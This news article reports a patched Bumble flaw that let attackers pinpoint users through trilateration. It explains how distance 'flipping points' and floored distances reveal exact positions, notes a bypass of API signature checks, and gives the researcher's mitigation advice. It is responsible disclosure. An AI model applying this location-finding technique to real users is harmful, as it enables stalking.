A security flaw in the trendy dating app, Bumble, allowed attackers to determine the exact position of other users.
Bumble, which now has over 100 million members globally, mimics Tinder’s’swipe right’ feature for expressing interest in possible dates and displaying users’ estimated geographic distance of potential matches.
Using fictitious Bumble profiles, a security analyst devised and carried out a ‘trilateration’ assault that pinpointed the exact location of a fictitious victim.
As a consequence, Bumble patched a flaw that might have resulted in stalking if left unaddressed.
According to Robert Heaton, a software engineer at transactions processor Stripe, his discovery may have given attackers the ability to locate victims’ home locations and, to some extent, monitor their activities.
However, “it wouldn’t give an attacker a literal live feed of a victim’s location, since Bumble doesn’t update location all that often, and rate limits might mean that you can only check [say] once an hour (I don’t know, I didn’t check),” he said in an interview.
For the discovery, the researcher received a $2,000 bug reward, which he gave to the Against Malaria Foundation.
Overturning The Script
Heaton built an automated script as part of his investigation that issued a series of queries to Bumble servers that continually moved the threat actor before seeking the victim’s distance.
“If an attacker (i.e. us) can find the point at which the reported distance to a user flips from, say, 3 miles to 4 miles, the attacker can infer that this is the point at which their victim is exactly 3.5 miles away from them,” Heaton describes how he drew up a fictitious scenario to show how an assault may play out in the real-life, in a blog post. For an example, “3.49999 miles rounds down to 3 miles, 3.50000 rounds up to 4,”, Heaton added.
The assailant would know the three exact lengths to their target necessary to conduct accurate trilateration after they found three “flipping points.”
Bumble, on the other hand, always rounds down – or ‘floors’ – distances, rather than rounding up or down.
“This discovery doesn’t break the attack,” Heaton said. “It just means you have to edit your script to note that the point at which the distance flips from 3 miles to 4 miles is the point at which the victim is exactly 4.0 miles away, not 3.5 miles.”
Heaton may also fake ‘swipe yes’ queries on anyone who expressed an interest in a profile without paying the $1.99 charge. The attack depends on bypassing API request signature verification.
Future-Proofing
Heaton discovered the flaw on June 15, and it was reportedly patched within 72 hours.
He commended Bumble in particular for introducing additional restrictions “that prevent you from matching with or viewing users who aren’t in your match queue” as “a shrewd way to reduce the impact of future vulnerabilities”.
Heaton also suggested that Bumble adjust users’ positions to the nearest 0.1 degrees of latitude and longitude before computing distances between them and rounding the outcome to the nearest mile in his vulnerability analysis.
“There would be no way that a future vulnerability could expose a user’s exact location via trilateration since the distance calculations won’t even have access to any exact locations,” Heaton explained.
